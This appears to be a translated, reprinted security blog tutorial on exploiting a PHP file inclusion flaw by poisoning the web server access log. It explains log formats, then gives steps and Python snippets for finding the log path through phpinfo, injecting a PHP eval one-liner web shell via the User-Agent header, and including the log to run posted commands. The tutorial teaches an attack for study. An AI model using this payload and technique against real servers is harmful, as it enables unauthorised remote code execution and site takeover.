[Network Security] File inclusion vulnerability: getshell through log poisoning

Blogger nickname: Jumping Stairs Penguin

Blogger's column: Network Security Technology

Purpose: this blog exists to exchange ideas with fellow technical readers. Everyone's skills have gaps, the blogger's included, so advice is asked for with humility and guidance from friends is welcome.
The blogger's motto: discover the light, follow the light, become the light, emit the light.
The blogger's research directions: penetration testing, machine learning.
The blogger's message: thank you for your support; it is what drives me forward.

 

1. File inclusion vulnerabilities

File inclusion itself was explained in an earlier post; follow the link there if you want the details.
 

2. The role of logs

(1) What is a website log?

A server log is one or more log files automatically created and maintained by a server that contain a list of the activities it performs.

A typical example is a web server's access log, which contains a history of page requests. The W3C maintains a standard format for web server log files, the Common Log Format, though proprietary formats also exist. New entries are appended to the end of the file. Each entry records information about the request: client IP address, request date/time, page requested, HTTP status code, bytes served, user agent, referrer, and so on. This data may be written to a single file or split across several logs, such as an access log, error log, and referrer log. Server logs typically do not collect user-specific information.
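To make the format concrete, here is a sketch of parsing one Common Log Format line with a regular expression. The log line itself is a made-up example, not taken from the walkthrough's target:

```python
import re

# One line in Apache's Common Log Format (a made-up example request):
line = '203.0.113.5 - - [10/Oct/2023:13:55:36 +0800] "GET /index.php HTTP/1.1" 200 2326'

# Field order: client IP, identd, userid, [timestamp], "request", status, bytes
CLF = re.compile(
    r'(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

m = CLF.match(line)
print(m.group('ip'), m.group('status'))  # 203.0.113.5 200
```

Note that the request line (and, in the combined format, the User-Agent and referrer) are attacker-controlled strings copied into the file verbatim, which is what the rest of this article exploits.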

(2) The role of logs

1. Website logs and website analytics complement each other. By analyzing the logs we can learn where visitors come from, what they are looking for, which pages are most popular, and where they leave the site. Administrators, operators, and marketers can use this data to track traffic in real time, understand user behavior, and infer user intent, and then optimize the site, improve the user experience, grow traffic, convert more visitors into members or customers, and maximize revenue from limited investment.

2. The log records the site's operation in detail, so when something goes wrong, the specifics of the error (error page, error code, and so on) can be recovered from the log and the gap closed. For example: find 404 pages and try to restore access; find other problem pages, including dead links and abnormal return codes, and repair them; for dead links that cannot be restored, collect them in a txt file and submit it to the Baidu webmaster platform.

3. The log also records in detail how search-engine spiders crawl the site. Analyzing the spiders' behavior makes SEO work more concrete and traceable and supports search-engine-friendly adjustments. For example, if Baidu's spider is found to visit the site at a fixed time each day, content updates can be scheduled within that window.

3. Reproducing the vulnerability

(1) Find the absolute path of the log file through phpinfo
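For orientation, path settings such as error_log and DOCUMENT_ROOT can be pulled out of a saved phpinfo() page with a quick search. The HTML fragment below is a hypothetical stand-in; the real page is far larger and its markup varies by PHP version:

```python
import re

# Hypothetical fragment of phpinfo() output (invented values for illustration).
phpinfo_html = (
    '<tr><td class="e">error_log</td>'
    '<td class="v">C:/Apache/logs/error.log</td></tr>'
    '<tr><td class="e">DOCUMENT_ROOT</td>'
    '<td class="v">C:/Apache/htdocs</td></tr>'
)

# Grep the rendered page for settings that reveal absolute server paths.
paths = {}
for key in ("error_log", "DOCUMENT_ROOT"):
    m = re.search(key + r'</td><td class="v">([^<]+)', phpinfo_html)
    if m:
        paths[key] = m.group(1)

print(paths)  # absolute paths leaked by phpinfo()
```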

  

(2) View the source code at that path

  

(3) Make an arbitrary request; it is recorded in the log
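The point of this step can be sketched in a few lines. This is a toy imitation of the line a web server appends for each request (combined log format, made-up values), not the server's actual code; it shows that request fields are written verbatim:

```python
# Illustrative only: a toy version of the line a web server appends to its
# access log for each request (combined log format; values are made up).
def log_line(ip, request, status, size, user_agent):
    # The request line and User-Agent are written verbatim,
    # which is exactly what log poisoning abuses.
    return (f'{ip} - - [10/Oct/2023:13:55:36 +0800] '
            f'"{request}" {status} {size} "-" "{user_agent}"')

entry = log_line("203.0.113.5", "GET /test HTTP/1.1", 404, 512,
                 "Mozilla/5.0 (Windows NT 10.0)")
print(entry)
```

Even a 404 for a nonexistent page still produces an entry, so the attacker fully controls what lands in the file.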

  

(4) Open the log

  

We can see that the request was indeed recorded.

(5) Browse to the log directory via the URL

  

(6) Write the one-sentence Trojan

  

(7) Capture the packet and edit the payload back in so the code is written to the log intact
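Steps (6) and (7) can be sketched together. The classic PHP one-liner goes into the User-Agent header: if it were typed into the URL the browser would URL-encode the angle brackets, so the request is captured (e.g. in Burp) and the raw payload edited in before sending. The host below is a hypothetical placeholder:

```python
# A minimal sketch of the poisoning request, assuming a hypothetical target host.
payload = "<?php eval($_POST['cmd']); ?>"

request = (
    "GET / HTTP/1.1\r\n"
    "Host: target.example\r\n"      # hypothetical target
    f"User-Agent: {payload}\r\n"    # raw payload, not URL-encoded
    "Connection: close\r\n"
    "\r\n"
)
print(request)
```

Once the server logs this request, the log file contains executable PHP code.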

  

 (8) Verification
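Verification means including the poisoned log through the file inclusion point and POSTing a command for the one-liner to execute. The script name include.php and its ?file= parameter are hypothetical stand-ins for whatever inclusion point the target actually exposes; the log path is the one found via phpinfo() in step (1):

```python
from urllib.parse import urlencode

# Hypothetical inclusion point and log path (adjust to the real target).
include_url = ("http://target.example/include.php?"
               + urlencode({"file": "../../Apache/logs/access.log"}))

# Body of the POST request handled by eval($_POST['cmd']) in the log.
post_body = urlencode({"cmd": "phpinfo();"})

print(include_url)
print(post_body)
```

If the inclusion succeeds, the server evaluates the PHP buried in the log and the command output appears amid the raw log contents.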

  

(9) View the result

 

Because of an encoding problem the output looks garbled, but you can see that an IP address is present.


 


Reprinted from: blog.csdn.net/weixin_50481708/article/details/126653329